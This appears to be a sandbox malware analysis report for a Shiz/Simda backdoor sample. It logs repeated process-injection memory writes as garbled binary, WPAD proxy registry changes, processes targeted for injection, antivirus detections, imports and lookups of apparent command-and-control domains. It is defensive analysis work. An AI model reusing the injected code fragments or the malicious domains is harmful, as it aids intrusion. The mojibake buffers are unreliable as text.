PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000001f0 base_address: 0x02601000	success	1	0
1619691122.536625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x000001f0 base_address: 0x02654000	success	1	0
1619691122.567625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x000001f4 base_address: 0x02660000	success	1	0
1619691122.567625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000001f4 base_address: 0x02661000	success	1	0
1619691122.583625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x000001f4 base_address: 0x026b4000	success	1	0
1619691122.614625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x000001f4 base_address: 0x026c0000	success	1	0
1619691122.614625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000001f4 base_address: 0x026c1000	success	1	0
1619691122.630625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x000001f4 base_address: 0x02714000	success	1	0
1619691122.645625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x000001f4 base_address: 0x02720000	success	1	0
1619691122.645625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000001f4 base_address: 0x02721000	success	1	0
1619691122.661625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x000001f4 base_address: 0x02774000	success	1	0
1619691122.676625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x000001f4 base_address: 0x02780000	success	1	0
1619691122.676625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000001f4 base_address: 0x02781000	success	1	0
1619691122.708625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x000001f4 base_address: 0x027d4000	success	1	0
1619691122.723625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x000001f4 base_address: 0x027e0000	success	1	0
1619691122.723625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000001f4 base_address: 0x027e1000	success	1	0
1619691122.739625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x000001f4 base_address: 0x02834000	success	1	0

Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)

Time & API	Arguments	Status
1619691125.223625 RegSetValueExA	key_handle: 0x000006b4 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason	success
1619691125.223625 RegSetValueExA	key_handle: 0x000006b4 value: &D£¢<× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime	success
1619691125.223625 RegSetValueExA	key_handle: 0x000006b4 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision	success
1619691125.223625 RegSetValueExW	key_handle: 0x000006b4 value: 网络 2 regkey_r: WpadNetworkName reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName	success
1619691125.223625 RegSetValueExA	key_handle: 0x000006b8 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason	success
1619691125.223625 RegSetValueExA	key_handle: 0x000006b8 value: &D£¢<× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime	success
1619691125.223625 RegSetValueExA	key_handle: 0x000006b8 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision	success
1619691125.286625 RegSetValueExW	key_handle: 0x000004a8 value: {40112ABE-63B3-43C3-BE93-1440EE3AF106} regkey_r: WpadLastNetwork reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork	success
1619691125.973625 RegSetValueExA	key_handle: 0x000003c0 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason	success
1619691125.973625 RegSetValueExA	key_handle: 0x000003c0 value: `¶£¢<× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime	success
1619691125.973625 RegSetValueExA	key_handle: 0x000003c0 value: 0 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision	success
1619691125.973625 RegSetValueExW	key_handle: 0x000003c0 value: 网络 2 regkey_r: WpadNetworkName reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName	success
1619691125.973625 RegSetValueExA	key_handle: 0x00000474 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason	success
1619691125.973625 RegSetValueExA	key_handle: 0x00000474 value: `¶£¢<× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime	success
1619691125.973625 RegSetValueExA	key_handle: 0x00000474 value: 0 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision	success

Network activity contains more than one unique useragent (2 个事件)

process	svchost.exe				useragent	Internal
process	svchost.exe				useragent	Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Expresses interest in specific running processes (11 个事件)

process	vboxservice.exe
process: potential process injection target	csrss.exe
process	system
process	audiodg.exe
process: potential process injection target	explorer.exe
process: potential process injection target	svchost.exe
process: potential cuckoo sandbox detection	pythonw.exe
process	searchprotocolhost.exe
process	8e06cec4b5faf0db8f785f458b7dbce5.exe
process: potential process injection target	winlogon.exe
process	mobsync.exe

Generates some ICMP traffic

File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 个事件)

Bkav	W32.AIDetectVM.malware1
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zusy.326830
FireEye	Generic.mg.8e06cec4b5faf0db
CAT-QuickHeal	Backdoor.Generic
McAfee	BackDoor-FDOB!8E06CEC4B5FA
Cylance	Unsafe
Zillya	Trojan.Shiz.Win32.554
SUPERAntiSpyware	Trojan.Agent/Gen-Shiz
K7AntiVirus	Spyware ( 004cadd91 )
Alibaba	Backdoor:Win32/Simda.ef3da10d
K7GW	Spyware ( 004cadd91 )
Cybereason	malicious.4b5faf
Arcabit	Trojan.Zusy.D4FCAE
Baidu	Win32.Trojan-Spy.Shiz.b
Cyren	W32/Shiz.R.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Trojan.Generic-6323528-0
Kaspersky	HEUR:Backdoor.Win32.Generic
BitDefender	Gen:Variant.Zusy.326830
NANO-Antivirus	Trojan.Win32.Ibank.esrglb
AegisLab	Trojan.Win32.Generic.m!e
Avast	Win32:Shiz-JT [Trj]
Tencent	Backdoor.Win32.Generic.a
Ad-Aware	Gen:Variant.Zusy.326830
TACHYON	Backdoor/W32.Shiz
Sophos	ML/PE-A + Mal/Emogen-Y
Comodo	TrojWare.Win32.Spy.Shiz.ZV@6ldvxf
F-Secure	Trojan.TR/Hijacker.Gen
DrWeb	Trojan.PWS.Ibank.323
VIPRE	Trojan.Win32.Generic!BT
McAfee-GW-Edition	BehavesLike.Win32.Backdoor.fh
Emsisoft	Gen:Variant.Zusy.326830 (B)
Ikarus	Backdoor.Win32.Simda
Jiangmin	Backdoor.Generic.axsv
eGambit	Unsafe.AI_Score_99%
Avira	TR/Hijacker.Gen
Antiy-AVL	Trojan/Win32.Unknown
Kingsoft	Win32.Heur.KVMH017.a.(kcloud)
Gridinsoft	Trojan.Win32.Agent.ko!s1
Microsoft	Backdoor:Win32/Simda.gen!B
ZoneAlarm	HEUR:Backdoor.Win32.Generic
GData	Win32.Trojan.Spyshiz.A
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win32.Gen
Acronis	suspicious
BitDefenderTheta	Gen:NN.ZexaF.34670.wqX@a40ksLo
MAX	malware (ai score=82)

暂无二进制图像该样本未生成二进制可视化图像

暂无运行截图该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手，可以帮您分析和解读恶意软件报告。请随时向我提问！

🔍 主要威胁分析

⚡ 行为特征

🛡️ 防护建议

🔧 技术手段

🎯 检测方法

🤖

Static Analysis
Strings

PE Compile Time

2011-08-02 17:26:00

Imports

Library MSVCRT.dll:

• 0x40412c wcsstr

• 0x404130 _snwprintf

• 0x404134 strstr

• 0x404138 _snprintf

• 0x40413c _except_handler3

• 0x404140 memset

• 0x404144 memcpy

Library SHELL32.dll:

• 0x404160

• 0x404164 SHGetFolderPathA

Library SHLWAPI.dll:

• 0x40416c PathAddBackslashA

• 0x404170 StrStrIA

• 0x404174 PathFileExistsA

• 0x404178 PathAppendA

Library ntdll.dll:

• 0x404190 RtlAdjustPrivilege

• 0x404194 RtlImageNtHeader

• 0x404198 RtlCreateUserThread

Library KERNEL32.dll:

• 0x404028 GetSystemTimeAsFileTime

• 0x40402c GetModuleFileNameW

• 0x404030 SetCurrentDirectoryA

• 0x404034 MoveFileA

• 0x404038 DeviceIoControl

• 0x40403c ExitProcess

• 0x404040 GlobalAddAtomA

• 0x404044 GlobalFindAtomA

• 0x404048 CopyFileA

• 0x40404c GetCurrentProcessId

• 0x404050 InterlockedDecrement

• 0x404054 CreateFileW

• 0x404058 GetVersionExA

• 0x40405c FreeLibrary

• 0x404060 IsDebuggerPresent

• 0x404064 GetTickCount

• 0x404068 GetVolumeInformationA

• 0x40406c GetEnvironmentVariableA

• 0x404070 GetModuleFileNameA

• 0x404074 CreateFileA

• 0x404078 SetFilePointer

• 0x40407c MoveFileExA

• 0x404080 lstrcpynA

• 0x404084 SetEndOfFile

• 0x404088 UnlockFile

• 0x40408c LockFile

• 0x404090 SetFileTime

• 0x404094 WriteFile

• 0x404098 IsBadWritePtr

• 0x40409c ReadFile

• 0x4040a0 GetFileSizeEx

• 0x4040a4 GetLastError

• 0x4040a8 SetFileAttributesA

• 0x4040ac GetTempFileNameA

• 0x4040b0 GetFileTime

• 0x4040b4 GetTempPathA

• 0x4040b8 DeleteFileA

• 0x4040bc GetProcAddress

• 0x4040c0 GetModuleHandleA

• 0x4040c4 HeapAlloc

• 0x4040c8 HeapFree

• 0x4040cc GetProcessHeap

• 0x4040d0 HeapValidate

• 0x4040d4 GetCurrentProcess

• 0x4040d8 Sleep

• 0x4040dc FlushInstructionCache

• 0x4040e0 VirtualAlloc

• 0x4040e4 VirtualQuery

• 0x4040e8 Process32First

• 0x4040ec VirtualFree

• 0x4040f0 CreateRemoteThread

• 0x4040f4 OpenProcess

• 0x4040f8 CreateProcessA

• 0x4040fc Module32First

• 0x404100 GetHandleInformation

• 0x404104 VirtualAllocEx

• 0x404108 LoadLibraryA

• 0x40410c Process32Next

• 0x404110 CreateToolhelp32Snapshot

• 0x404114 Module32Next

• 0x404118 CloseHandle

• 0x40411c WriteProcessMemory

• 0x404120 SwitchToThread

• 0x404124 GetSystemWindowsDirectoryA

Library USER32.dll:

• 0x404180 FindWindowA

• 0x404184 CharUpperA

• 0x404188 PostMessageA

Library ADVAPI32.dll:

• 0x404000 RegCreateKeyExA

• 0x404004 RegSetValueExA

• 0x404008 RegQueryValueExA

• 0x40400c RegOpenKeyExA

• 0x404010 RegFlushKey

• 0x404014 RegCloseKey

• 0x404018 OpenProcessToken

• 0x40401c GetTokenInformation

• 0x404020 GetUserNameA

Library ole32.dll:

• 0x4041a0 CoUninitialize

• 0x4041a4 CoCreateInstance

• 0x4041a8 CoInitializeSecurity

• 0x4041ac CoInitializeEx

Library OLEAUT32.dll:

• 0x40414c SysFreeString

• 0x404150 SysAllocString

• 0x404154 VariantClear

• 0x404158 VariantInit

Hosts

No hosts contacted.

DNS

Name	Response	Post-Analysis Lookup
lyvyxor.com	A 208.100.26.245	208.100.26.245
qekyqop.com
